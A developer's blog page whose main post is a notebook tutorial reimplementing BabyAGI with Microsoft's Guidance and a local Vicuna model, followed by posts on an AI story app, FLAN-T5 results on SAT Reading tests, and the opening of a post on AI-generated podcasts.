An introduction to Guidance: BabyAGI without OpenAI

By: jeffq
May 17, 2023 at 15:18

Guidance

If you’re already convinced of how awesome Guidance is, you can skip this section

Guidance is a new template language from Microsoft that allows you to guide the output of language models. This may not sound revolutionary on the surface, but if you’ve ever tried to compose outputs from an LM in a non-trivial manner and spent hours re-processing the same prompt or writing tons of boilerplate chaining code, Guidance really can be a next-level unlock.

One of the biggest frustrations when it comes to chaining LM outputs is trying to “force” the model to generate in a specific way, for example following certain steps or producing a structure that’s easy to interpret programmatically. Indeed, the classic chain-of-thought prompt (i.e. “let’s think about it step-by-step”) is merely a prompting technique to guide the model to reason about the task in a desirable way. But what if we could just like… make the model do what we want? That’s where Guidance comes in.

Guidance is essentially Handlebars templates for language models, where a magic gen command invokes the model in the context of the evaluated template up to this point. As developers, we write the template structure of what we want the output of the model to be, and Guidance manages having the model “fill in the blanks”. By way of illustration, consider:

In [ ]:
from IPython.display import Image
from IPython.core.display import HTML 
Image(url="https://raw.githubusercontent.com/microsoft/guidance/main/docs/figures/json_animation.gif", width=376, height=234)
Out[ ]: (animated GIF from the Guidance README showing the template being filled in)

Here, the text on the white background is static, the blue-background text represents variables passed in at runtime, and the green-background text is the output generated by the language model. The Guidance code for this is:

The following is a character profile for an RPG game in JSON format.
```json
{
    "id": "{{id}}",
    "description": "{{description}}",
    "name": "{{gen 'name'}}",
    "age": {{gen 'age' pattern='[0-9]+' stop=','}},
    "armor": "{{#select 'armor'}}leather{{or}}chainmail{{or}}plate{{/select}}",
    "weapon": "{{select 'weapon' options=valid_weapons}}",
    "class": "{{gen 'class'}}",
    "mantra": "{{gen 'mantra' temperature=0.7}}",
    "strength": {{gen 'strength' pattern='[0-9]+' stop=','}},
    "items": [{{#geneach 'items' num_iterations=5 join=', '}}"{{gen 'this' temperature=0.7}}"{{/geneach}}]
}```

In Guidance we specify how we want the final text to look, using control statements such as gen to mark where the model should generate specific pieces. There are tons of different control statements — in the above example we use the select statement to choose between only a few options (underneath, Guidance compares the log probabilities of the options and chooses the most likely one). We can also specify regular expressions that define the valid form of an output (making strength be numeric). The Guidance repo has tons of example notebooks that show off its various capabilities. One thing I will say is that, as of this writing (May 2023), there is almost no formalized documentation, as Guidance is still very much a work-in-progress. I did all of my learning by looking through the example notebooks.
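
To make this concrete, here is a minimal sketch of evaluating a trimmed-down version of the profile template above. It assumes llm is a Guidance transformers model (one is loaded later in this post); the description value is just an example.

import guidance

# Assumes `llm` is a guidance.llms.Transformers model, e.g. the Vicuna model loaded later in this post
profile = guidance("""The following is a character profile for an RPG game in JSON format.
```json
{
    "description": "{{description}}",
    "name": "{{gen 'name'}}",
    "armor": "{{#select 'armor'}}leather{{or}}chainmail{{or}}plate{{/select}}"
}```""")

# Runtime variables are passed as keyword arguments; generated values come back on the result object
out = profile(description="A quick and nimble fighter.", llm=llm)
print(out["name"], out["armor"])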

Local models in Guidance

One of the best things about Guidance is its first-class support of running on local models via transformers. I would go so far as to say that in Guidance local models are strictly better than using the OpenAI API (although it does support this as well). Perhaps its greatest feature from a quality-of-life perspective when using local models is “acceleration”.

Guidance acceleration works by caching the intermediate states of the model up to the boundary points within the template. When the template is re-evaluated, Guidance can “skip ahead” to the point where the prompt actually changes. This greatly speeds up the core write-run-evaluate developer loop when designing templates. If you’ve ever sat there re-running the same prompt for the ten thousandth time just to get to where you’ve made a change, then acceleration is truly a life saver.

BabyAGI

BabyAGI is a proof-of-concept “AGI”. In reality, it’s a task management system that uses a vector database and instructs the language model to plan out and execute tasks aimed at completing a specific objective (for example, “paperclip the universe”).

In [ ]:
Image(url="https://user-images.githubusercontent.com/21254008/235015461-543a897f-70cc-4b63-941a-2ae3c9172b11.png", width=496, height=367)
Out[ ]: (diagram of the BabyAGI task loop from the original repository)

The reference BabyAGI code uses the OpenAI APIs. I will refrain from editorializing here, but let’s just say I’d prefer to be able to do this using open source models 🙂.

BabyAGI in Guidance

First, we need to install the prerequisites. We’ll be using transformers and accelerate to run our local models, and langchain, faiss-cpu, and sentence_transformers for embeddings and the vector database.

In [ ]:
!pip install transformers accelerate langchain faiss-cpu sentence_transformers ipywidgets

We’ll be using Vicuna as our language model. Vicuna has shown itself to be an excellent open-source competitor to GPT-3.5. It is a 13B-parameter model finetuned from LLaMA.

Loading a 13B-parameter model takes 52 GB of RAM at full precision or 26 GB at half precision. transformers has the helpful load_in_8bit parameter that reduces this to 13 GB, but unfortunately Guidance doesn’t support it yet (until PR #8 is merged). I have a fork of Guidance that adds in support — install this if you want to use 8-bit quantization. Otherwise, the regular guidance package suffices.

In [ ]:
# 8-bit quantization support
!pip install git+https://github.com/jquesnelle/guidance@transformers-quantization-parameters bitsandbytes

# or, regular guidance
# !pip install guidance

Next, it’s time to load our model!

In [ ]:
import guidance

llm = guidance.llms.transformers.Vicuna(
    model="eachadea/vicuna-13b-1.1",
    device_map="auto",
    load_in_8bit=True
)

We’ll use LangChain to help us with embeddings and vector databases. The HuggingFaceEmbeddings class uses all-mpnet-base-v2 to generate embeddings, and we’ll use the simple FAISS vector database from Meta.

In [ ]:
import faiss
from langchain import InMemoryDocstore
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.vectorstores import FAISS

embeddings_model = HuggingFaceEmbeddings(model_kwargs={"device": "cuda:0"})
embedding_size = 768

def make_vectorstore():
    index = faiss.IndexFlatL2(embedding_size)
    return FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})
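
As a quick sanity check (not part of the original flow), the store can be exercised on its own with a made-up result; add_texts and similarity_search_with_score are the same calls the BabyAGI loop uses later.

# Hypothetical smoke test: store one made-up result and query it back
vectorstore = make_vectorstore()
vectorstore.add_texts(
    texts=["Gathered current weather data for San Francisco."],
    metadatas=[{"task": "Gather weather data"}],
    ids=["result_1"],
)
for doc, score in vectorstore.similarity_search_with_score("weather in SF", k=1):
    print(score, doc.page_content)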

Okay, let’s write some Guidance. BabyAGI has three core prompts: task execution, task creation, and task prioritization. We’ll start with the task execution prompt. The reference implementation can be found here.

In [ ]:
execution_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are an AI who performs one task based on the following objective: {{objective}}.
Take into account these previously completed tasks: {{context}}.
Your task: {{task}}.
{{~/user}}

{{#assistant~}}
{{gen 'result'}}
{{~/assistant~}}
""")

Many models are “chat” trained. That is to say, they’ve been finetuned to act as a chatbot. To get the best performance out of these models, you need to prompt them in the same way that they were trained. Unfortunately, each model has its own idiosyncrasies for this prompting. Normally, this would mean you would need different prompts for each model. However, Guidance solves this with the special #system, #user, and #assistant commands. Several popular models are supported (Vicuna, StableLM, MPT), and adding support for a new model is a simple subclass. Once supported, the same prompt can be used across different chat-trained models.

In this prompt, objective, context, and task are variables we’ll pass in at runtime. We’ll generate the result variable, which will be accessible as a property of the returned object when we call execution_prompt.

In [ ]:
def get_top_tasks(vectorstore, query, k):
    results = vectorstore.similarity_search_with_score(query, k=k)
    if not results:
        return []
    sorted_results, _ = zip(*sorted(results, key=lambda x: x[1], reverse=True))
    return [str(item.page_content) for item in sorted_results]

def execute_task(vectorstore, objective, task, k=5):
    context = get_top_tasks(vectorstore=vectorstore, query=objective, k=k) \
            if vectorstore is not None else []
    return execution_prompt(objective=objective, context=context, task=task, llm=llm)["result"]
In [ ]:
sample_objective = "Write a weather report for SF today"
FIRST_TASK = "Write a todo list to complete the objective"
sample_execute_task = execute_task(vectorstore=None, objective=sample_objective, task=FIRST_TASK)
sample_execute_task
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are an AI who performs one task based on the following objective: Write a weather report for SF today. Take into account these previously completed tasks: []. Your task: Write a todo list to complete the objective.
assistant
1. Gather current weather data for San Francisco. 2. Analyze data to determine current weather conditions in San Francisco. 3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns. 5. Organize the information in a logical and easy-to-understand format. 6. Review and edit the weather report for accuracy and clarity. 7. Present the weather report in a professional and engaging manner.
Out[ ]:
'1. Gather current weather data for San Francisco.\n2. Analyze data to determine current weather conditions in San Francisco.\n3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.\n4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.\n5. Organize the information in a logical and easy-to-understand format.\n6. Review and edit the weather report for accuracy and clarity.\n7. Present the weather report in a professional and engaging manner.'

When executing in a Jupyter notebook, Guidance automatically presents the output in an easily digestible format. We can see the separate system, user, and assistant sections, see where runtime variables were inserted (blue), and see where the model generated new text (green). Every variable that is created via gen is available in the result object directly — already parsed!

Next up is the task creation prompt. A large part of the reference implementation is concerned with cleaning up the response from the model and hoping (praying) it will follow instructions regarding how to structure the output so it can be programmatically interpreted. But this is just the kind of task that Guidance excels at!

Our goal is to have the model take whatever the output of the previous task was and create a list of tasks to carry out the objective. This is done iteratively, so we pass in any previously incomplete tasks, and ask the model for new tasks. While we politely ask the model to output the tasks as an array, with Guidance we can actually make it happen.

In [ ]:
creation_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are a task creation AI that uses the result of an execution agent to create new tasks with the following objective: {{objective}}.
The last completed task has the result: {{result}}.
This result was based on this task description: {{task_description}}.
These are the incomplete tasks: {{incomplete_tasks}}.
Based on the result, create new tasks to be completed by the AI system that do not overlap with the incomplete tasks.
{{~/user}}

{{#assistant~}}
```json
[{{#geneach 'tasks' stop="]"}}{{#unless @first}}, {{/unless}}"{{gen 'this'}}"{{/geneach}}]
```
{{~/assistant~}}
""")

The geneach command tells Guidance to do a looped generation, creating a list of tasks. By placing geneach inside of [""] we can enforce a JSON array structure (the unless command is used to add the necessary commas).

In [ ]:
def create_tasks(result, task_description, task_list, objective):
    response = creation_prompt(
        result=result,
        task_description=task_description,
        incomplete_tasks=task_list,
        objective=objective,
        llm=llm
    )
    new_tasks = [task for task in response["tasks"] if task not in task_list]
    return [{"task_name": task_name} for task_name in new_tasks if task_name.strip()]

sample_created_tasks = create_tasks(
    result=sample_execute_task,
    task_description=FIRST_TASK,
    task_list=[],
    objective=sample_objective
)
sample_created_tasks
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task creation AI that uses the result of an execution agent to create new tasks with the following objective: Write a weather report for SF today. The last completed task has the result: 1. Gather current weather data for San Francisco. 2. Analyze data to determine current weather conditions in San Francisco. 3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns. 5. Organize the information in a logical and easy-to-understand format. 6. Review and edit the weather report for accuracy and clarity. 7. Present the weather report in a professional and engaging manner.. This result was based on this task description: Write a todo list to complete the objective. These are the incomplete tasks: []. Based on the result, create new tasks to be completed by the AI system that do not overlap with the incomplete tasks.
assistant
```json ["Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.", "Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.", "Organize the information in a logical and easy-to-understand format.", "Review and edit the weather report for accuracy and clarity.", "Present the weather report in a professional and engaging manner."] ```
Out[ ]:
[{'task_name': 'Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.'},
 {'task_name': 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.'},
 {'task_name': 'Organize the information in a logical and easy-to-understand format.'},
 {'task_name': 'Review and edit the weather report for accuracy and clarity.'},
 {'task_name': 'Present the weather report in a professional and engaging manner.'}]

Our tasks were correctly generated and parsed! We then place these in a dictionary under the key task_name for later use in the full BabyAGI procedure.

The last prompt to write is the task prioritization prompt.

In [ ]:
prioritization_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: {{task_names}}.
Consider the ultimate objective of your team: {{objective}}.
Do not remove any tasks. Return the result as a numbered list, like:
#. First task
#. Second task
Start the task list with number {{next_task_id}}.
{{~/user}}

{{#assistant~}}
{{#geneach 'tasks'}}{{#if (equal @index last_task_index)}}{{break}}{{/if}}{{add @index next_task_id}}. {{gen 'this' stop="\\n"}}
{{/geneach}}
{{~/assistant~}}
""")

In the task creation prompt we asked the model to output the tasks as a JSON array. Now we’ll try a harder use case: an ordered numerical list starting with some arbitrary number.

Based on experience, the model often hallucinates here and invents new tasks or repeats them. However, we want it to simply re-order the existing tasks. While this could be solved with a redesigned prompt or a more aligned model, we can also use the if command to control the number of tasks that can be output and stop after a predetermined number.

Here, we compare the special @index of the current task being generated (a magic number updated by Guidance after each loop) and break out if it’s equal to the number of tasks we know we passed in.

In [ ]:
def prioritize_tasks(this_task_id, task_list, objective):
    task_names = [t["task_name"] for t in task_list]
    next_task_id = int(this_task_id) + 1
    response = prioritization_prompt(
        task_names=task_names,
        next_task_id=next_task_id,
        objective=objective,
        last_task_index=len(task_names) - 1,
        llm=llm
    )
    return [
        {"task_id": task_id, "task_name": task_name} 
            for task_id, task_name in 
                zip(range(next_task_id, next_task_id+len(task_list)), response["tasks"])
    ]

sample_prioritized_tasks = prioritize_tasks(
    this_task_id=1,
    task_list=sample_created_tasks,
    objective=sample_objective,
)
sample_prioritized_tasks
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: ['Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.', 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.', 'Organize the information in a logical and easy-to-understand format.', 'Review and edit the weather report for accuracy and clarity.', 'Present the weather report in a professional and engaging manner.']. Consider the ultimate objective of your team: Write a weather report for SF today. Do not remove any tasks. Return the result as a numbered list, like: #. First task #. Second task Start the task list with number 2.
assistant
2. Review and edit the weather report for accuracy and clarity. 3. Organize the information in a logical and easy-to-understand format. 4. Present the weather report in a professional and engaging manner. 5. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 6. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.
Out[ ]:
[{'task_id': 2,
  'task_name': 'Review and edit the weather report for accuracy and clarity.'},
 {'task_id': 3,
  'task_name': 'Organize the information in a logical and easy-to-understand format.'},
 {'task_id': 4,
  'task_name': 'Present the weather report in a professional and engaging manner.'},
 {'task_id': 5,
  'task_name': 'Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.'},
 {'task_id': 6,
  'task_name': 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.'}]

Now it’s time for the full BabyAGI procedure. It may be helpful to refer back to the diagram that shows the flow of logic, but essentially it’s our three prompts being run in succession.

In [ ]:
from collections import deque

def babyagi(objective, max_iterations=5):
    task_list = deque([{
        "task_id": 1,
        "task_name": FIRST_TASK
    }])
    task_id_counter = 1
    vectorstore = make_vectorstore()

    while max_iterations is None or max_iterations > 0:
        if task_list:

            # Step 1: Pull the first task
            task = task_list.popleft()

            # Step 2: Execute the task
            result = execute_task(
                vectorstore=vectorstore,
                objective=objective,
                task=task["task_name"]
            )
            this_task_id = int(task["task_id"])

            # Step 3: Store the result
            result_id = f"result_{task['task_id']}"
            vectorstore.add_texts(
                texts=[result],
                metadatas=[{"task": task["task_name"]}],
                ids=[result_id],
            )

            # Step 4: Create new tasks
            new_tasks = create_tasks(
                    result=result,
                    task_description=task["task_name"],
                    task_list=[t["task_name"] for t in task_list],
                    objective=objective,
                )
            for new_task in new_tasks:
                task_id_counter += 1
                new_task.update({"task_id": task_id_counter})
                task_list.append(new_task)

            # Step 5: Reprioritize task list
            task_list = deque(
                prioritize_tasks(
                    this_task_id,
                    list(task_list),
                    objective,
                )
            )
        max_iterations = None if max_iterations is None else max_iterations - 1

    return result
In [ ]:
babyagi("Write a weather report for Detroit today", max_iterations=4)
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: ['Make any necessary updates to the report based on new data or changes in the weather conditions', 'Ensure the report is accurate and up-to-date', 'Evaluate the effectiveness of the written report and visual graphic in conveying the weather information to the audience', 'Analyze the gathered weather data to determine the current weather conditions', 'Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information', 'Determine the current weather conditions in Detroit', 'Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information', 'Prioritize the tasks based on their importance and urgency to achieve the ultimate objective of writing a weather report for Detroit today.', 'Execute the tasks in the order of priority.']. Consider the ultimate objective of your team: Write a weather report for Detroit today. Do not remove any tasks. Return the result as a numbered list, like: #. First task #. Second task Start the task list with number 5.
assistant
5. Prioritize the tasks based on their importance and urgency to achieve the ultimate objective of writing a weather report for Detroit today. 6. Execute the tasks in the order of priority. 7. Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information. 8. Determine the current weather conditions in Detroit. 9. Evaluate the effectiveness of the written report and visual graphic in conveying the weather information to the audience. 10. Make any necessary updates to the report based on new data or changes in the weather conditions. 11. Analyze the gathered weather data to determine the current weather conditions. 12. Ensure the report is accurate and up-to-date. 13. Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information.
Out[ ]:
'Here is the weather report for Detroit:\n\nTemperature: The temperature in Detroit today is expected to reach a high of 75 degrees Fahrenheit and a low of 55 degrees Fahrenheit.\n\nPrecipitation: There is a chance of scattered thunderstorms throughout the day, with a 30% chance of precipitation.\n\nWind: The wind speed in Detroit today is expected to be light, with an average speed of 5-10 miles per hour. The wind is blowing from the southwest.\n\nOther relevant information: The humidity in Detroit today is expected to be around 60%, and the atmospheric pressure is 29.94 inches of mercury.\n\nPlease note that this weather report is based on current data and is subject to change. It is always a good idea to check the weather forecast before making any plans.\n\nIf you would like a visual graphic of the weather report, please let me know and I will be happy to provide one.'

And there you have it, BabyAGI in Guidance using only local, open source models!

Hopefully this was a helpful introduction. It will likely become outdated quickly, as Guidance is under very active development.


Choose Your Own Adventure

By: jeffq
May 11, 2023 at 11:44

Demo: https://cyoa.hooloovoo.ai/
Model: https://huggingface.co/emozilla/scifi-fantasy-author-7b-8k_delta

GitHub: Backend Frontend

When I was a kid, the place I absolutely wanted to be was the public library that was at the end of our street. Some of my earliest memories are of sitting in the “youth” section of that library. I knew it so well I could immediately tell when they’d placed new books out, or when some furniture was re-arranged. Hell, I’m only half the programmer I am today because, by necessity, I had to learn how to use the terminal-based inter-library book search database.

I read everything, but there was one specific section that captured my imagination like none other: the shelf devoted to the Choose Your Own Adventure book series. I checked out every one the library offered. Some were excellent, some were weird, some were — well, they were pulp kids books, what do you want? But the raw imaginative wonder they elicited is something I still remember to this day.


Part of my fascination with generative AI is in exploring how it can “unlock” the parts of our brain that, for this reason or that, are found lacking or wanting within us. I am not a great writer. Even less am I a great creative writer. However, it seems that generative AI can give me the “training wheels” to express myself.

Much handwringing has been done about AI destroying this profession or that profession. As a developer, the advances in coding AIs (e.g. codegen, StarCoder) may even threaten my profession even more than creative ones. But rather than being reactionary, I think we should look at these tools as lever-and-pullies for the mind; such tools that extended man’s ability to perform manual labor weren’t inherently unnatural or evil, but instead enabled man to become a better version of himself. The same can be true for generative AI.


Working on literAI helped me learn how to use large language models, but I came away really wanting to know how to make (or at least, augment) them. I work best when I have a defined goal or project to achieve, so a few months ago I set myself the task to re-create the Choose Your Own Adventure experiences of my youth. Here are my results!

cyoa is a mobile-friendly web app for creating your own story. It uses a finetuned version of LLaMA that I trained on a set of long-form public science fiction and fantasy stories to generate interesting and fun illustrated “books”. Trained at a context length of 8K tokens, it seems able to keep the story and characters coherent over long spans, which is essential for good storytelling.

Users can pick from one of two auto-generated “next steps” in the story, or alternatively write their own. What I enjoy when using it is the ability to “jump in” and have a specific character say or do something, and then let the AI take over from there.

The core model behind cyoa is available on my Hugging Face page as delta weights against the base LLaMA model (to comply with the LLaMA license). Summarizations of the generated choices and prompts for image generation are done using mosaicml/mpt-7b-instruct, and the images themselves use DreamShaper.
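
For reference, recovering a full model from delta weights usually looks roughly like the sketch below. This is a rough sketch of the common recipe rather than the exact script used for this model; the base-model id and output path are assumptions, and the delta checkpoint is assumed to share the base architecture so the state dicts line up key-for-key.

import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

BASE = "huggyllama/llama-7b"                          # assumed source of base LLaMA weights
DELTA = "emozilla/scifi-fantasy-author-7b-8k_delta"   # delta weights from this post

base = AutoModelForCausalLM.from_pretrained(BASE, torch_dtype=torch.float16)
delta = AutoModelForCausalLM.from_pretrained(DELTA, torch_dtype=torch.float16)
delta_state = delta.state_dict()

# recovered weight = base weight + delta weight, tensor by tensor
with torch.no_grad():
    for name, param in base.named_parameters():
        param += delta_state[name]

base.save_pretrained("scifi-fantasy-author-7b-8k")
AutoTokenizer.from_pretrained(BASE).save_pretrained("scifi-fantasy-author-7b-8k")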

The model does a good job carrying on the specific line of the story, although it sometimes struggles with major plot elements, preferring instead to keep the characters linearly progressing the established narrative. One thing that can be helpful is using the “Write your own” option to add in a sudden change like the start of a new chapter (just writing “CHAPTER ONE” is enough to do this) or a perspective shift.

CYOA is a novelty, but I hope it’s one that you enjoy as much as I do. Using AI to help us unlock new methods of expression within ourselves is, in my opinion, net positive for society. Enjoy 🙂.


Language Models vs. The SAT Reading Test

By: jeffq
February 20, 2023 at 16:32

tl;dr FLAN-T5 (11B) scored identically to GPT-3.5 (text-davinci-003) across the ten publicly available SAT Reading Tests. A finetuned 3B model scored within 7 percentage points of GPT-3.5 on held-out tests with 98% fewer parameters, while maintaining generalization

Models: base, large, xl, xxl Dataset: HuggingFace Code: GitHub

After working on literAI I’ve been interested in further exploring language models from a narrative/literary perspective. One question I had was “how well do these models actually ‘understand’ longer prose?”

Now, it just so happens that there’s a test we make teenagers take every year to determine this very fact! That is, the SAT (specifically, the Reading part).

The SAT Reading Test, despite its name, is multimodal. There is always one section that includes a combination of charts, tables, and graphs. However, the questions are clearly delineated — typically only three questions on the test reference the data. For the purposes of evaluation I excluded these questions. First, the results.

Data

FLAN-T5 11B scored identically to GPT-3.5, despite being less than 1/10th the size! It can also be run on a consumer GPU (<= 24 GB) when loaded in 8-bit inference mode! This offers further data supporting the hypothesis that Google did the open source local compute LM community a great service when it released FLAN-T5.
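
For anyone who wants to reproduce the single-GPU setup, loading FLAN-T5 XXL in 8-bit with transformers looks roughly like the sketch below; the prompt shown is illustrative, not the exact format used for the evaluation (that lives in the linked GitHub repo).

from transformers import AutoTokenizer, AutoModelForSeq2SeqLM

tokenizer = AutoTokenizer.from_pretrained("google/flan-t5-xxl")
model = AutoModelForSeq2SeqLM.from_pretrained(
    "google/flan-t5-xxl",
    device_map="auto",
    load_in_8bit=True,   # requires bitsandbytes; fits in ~24 GB of VRAM
)

# Illustrative prompt only; the real evaluation prompt includes the full passage and answer choices
prompt = "Passage: <passage text>\n\nQuestion: As used in line 93, \"becoming\" most nearly means\n\nA) emerging.\nB) fitting.\nC) developing.\nD) happening.\n\nAnswer:"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=8)[0], skip_special_tokens=True))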


One interesting aspect of the SAT Reading Test is that 30% of the questions reference specific lines within the passage under consideration.

Which choice best supports the conclusion that
Mr. Peters wants to attract attention?

A) Lines 80-81 (“Apparently… change”)
B) Lines 81-85 (“He straightened… hand”)
C) Lines 90-91 (“The young . . . Mr. Peters”)
D) Lines 91-93 (“He was… forty-five”)

SAT Practice Test #5 Question #9

As used in line 93, “becoming” most nearly means

A) emerging.
B) fitting.
C) developing.
D) happening.

SAT Practice Test #5 Question #10

This means that to properly answer the question the LM needs to be able to count lines in the presented passage and reason about them explicitly in the context of the passage itself. The dataset I created faithfully represents the line breaks as they appear on the test. What it doesn’t contain is the extra line-count helper column that appears next to the passage. For example, here is a snippet of what a passage on the actual test looks like:

SAT Practice Test #5 Passage #1

Note the italicized Line and counter, which appears every five lines. Even the regular passages are multimodal! While it’s certainly just text, communicating it requires more than presenting it merely as a sequence of characters. To see how the models performed on these types of questions I took a look at how the best open source model (FLAN-T5) scored on the two question classes.

FLAN-T5 scored between 5-13% worse on the “line number” questions than it did on the other questions on the test. Could the model just need a little help counting?

To test this theory I finetuned each of the FLAN-T5 models on eight of the ten practice tests, leaving the remaining two tests for validation. An especially huge thanks is due to Philipp Schmid for his excellent blog posts on finetuning FLAN-T5.
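
The finetuning itself follows the standard seq2seq recipe from those posts. The outline below is a sketch rather than the exact training script; the dataset id, column names, and hyperparameters are placeholders.

from datasets import load_dataset
from transformers import (AutoModelForSeq2SeqLM, AutoTokenizer, DataCollatorForSeq2Seq,
                          Seq2SeqTrainer, Seq2SeqTrainingArguments)

model_id = "google/flan-t5-xl"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForSeq2SeqLM.from_pretrained(model_id)

# Hypothetical dataset layout: one prompt (passage + question + choices) per row, the answer as the label
dataset = load_dataset("emozilla/sat-reading")

def tokenize(batch):
    model_inputs = tokenizer(batch["prompt"], truncation=True, max_length=2048)
    model_inputs["labels"] = tokenizer(text_target=batch["answer"], truncation=True, max_length=8)["input_ids"]
    return model_inputs

tokenized = dataset.map(tokenize, batched=True, remove_columns=dataset["train"].column_names)

trainer = Seq2SeqTrainer(
    model=model,
    args=Seq2SeqTrainingArguments(
        output_dir="flan-t5-xl-sat-reading",
        per_device_train_batch_size=1,
        gradient_checkpointing=True,
        learning_rate=1e-4,
        num_train_epochs=3,
    ),
    data_collator=DataCollatorForSeq2Seq(tokenizer, model=model),
    train_dataset=tokenized["train"],
)
trainer.train()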

The models themselves are available here: base, large, xl, xxl. Three of the four finetuned models outscored the original models, with the XL model showing the largest gain. Of particular interest is the XL model, which is within seven percentage points of GPT-3.5 while having 98% (!!!) fewer parameters (3B vs. 175B).

One problem with aggressive finetuning on small datasets is overfitting or loss of generalization. Do the finetuned models still perform as well as the original models on unseen tasks? To test this I ran the finetuned models on a subset of the SuperGLUE metrics.

              XXL PT  XXL FT  XL PT  XL FT  Large PT  Large FT  Base PT  Base FT
cb gpt         0.87    0.83   0.83   0.83     0.76      0.71     0.82     0.82
copa c1/c2     0.95    0.91   0.95   0.90     0.83      0.82     0.57     0.55
rte gpt        0.89    0.90   0.85   0.87     0.87      0.84     0.79     0.80
wic gpt        0.68    0.68   0.71   0.72     0.62      0.61     0.48     0.48
wsc gpt        0.76    0.77   0.73   0.75     0.66      0.61     0.45     0.46
Data

The above table represents only a few of the hundreds of metrics run — see the data for full results. They are, however, representative; the finetuned (FT) models maintain the same generalization capabilities as the pre-trained (PT) versions! It may be that the finetuned models are (by this limited measure) “better” than the originals, since they score higher on the SAT Reading Test while maintaining zero-shot unseen-task performance.

In conclusion, FLAN-T5 continues to show itself as a powerful model, both in its raw reasoning capabilities relative to closed-source models and in its ability to quickly learn new skills through finetuning — not to mention its accessibility on consumer-grade hardware. ty google


literAI: AI-generated open source visual podcasts

By: jeffq
February 2, 2023 at 14:35

Demo: https://literai.hooloovoo.ai/ Source: Generator, UI

At my previous job I did some shader programming, and generally tinkered around with GPU workloads, and even had the chance to attend Nvidia’s GPU Technology Conference a few times. I remember in 2018 or so being surprised that more and more of the conversation in this area was being dominated by these things called “deep neural networks”. During my CS studies I was focused on cryptography, but I was curious what all this was about and took an early version of Udacity’s Deep Learning Nanodegree (don’t laugh!)

The class was actually fairly insightful — making you learn about backpropagation, etc. from scratch and took you through the motions of the classic MNIST classification tasks and so forth. It ended with doing face generation using these fancy things called convolutional neural networks.

Some randomly generated faces created by a deep convolutional generative adversarial network I made as part of my #udacity course. Not super practical, but still eminently cool

P.S. Twitter asks "Who's in these photos?" when I upload them. The dreams of electric sheep, Twitter. pic.twitter.com/Tf6iAWHEl8

— emozilla (@theemozilla) July 8, 2018
such fidelity, much wow

Neat, but still felt a bit gadget-y to me. Like every nerd I assumed that someday humanity would develop “artificial” intelligence, but at the time it didn’t seem like such a thing was imminent.

Of course, then came Stable Diffusion and ChatGPT.


When I want to learn something technical, I need to be able to tinker with it. Let me get into VS Code, get something working locally, something I can step into as deep as I want to. And then it’s just, you know, messing around with it.

this is not an exaggeration

Over the past six months I’ve been deep-diving the latest AI advancements, tinkering as I go (I recommend the excellent Neural Networks from Scratch book to get jump-started). A few projects I wrote along the way were txt2imghd and transformers-openai-api.

One pain point I kept hitting is that it seemed like the coolest stuff was all behind an API, instead of being openly accessible. Don’t get me wrong — I probably spent more money on GPU time to run open models than if I’d just paid the damn API costs, and I don’t begrudge companies trying to, you know, actually make money — but whenever I wanted to tinker the best stuff required carefully rate limited API calls. I wanna do dumb shit in a tight for loop without the fear of a gazillion dollar bill!


One night while perusing the latest arXiv posts I came across SODA: Million-scale Dialogue Distillation with Social Commonsense Contextualization, which used research into knowledge graphs to generate prompts for text-davinci-003 (the model behind ChatGPT) to create a large dataset of synthetic dialogues along with the accompanying semantic information (e.g. the intent of one of the speakers). This dataset was then used to fine-tune the open source T5 language model from Google to create COSMO, a model that can generate realistic sounding human dialogues.

I spend a fair amount of time listening to audiobooks and podcasts, and this got me thinking about potential applications. Could a podcast about a novel be generated by a model like COSMO? (As part of my research I contributed some SODA data into Open Assistant, a project to create an open source ChatGPT). Furthermore, could it be done using consumer-grade hardware, i.e. not on an A100?
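
To give a flavor of what driving COSMO looks like, here is a rough sketch using the allenai/cosmo-xl checkpoint; the situation and dialogue are made up, and the exact separator conventions between the situation, role instruction, and turns are documented on the model card.

from transformers import AutoModelForSeq2SeqLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("allenai/cosmo-xl")
model = AutoModelForSeq2SeqLM.from_pretrained("allenai/cosmo-xl", device_map="auto")

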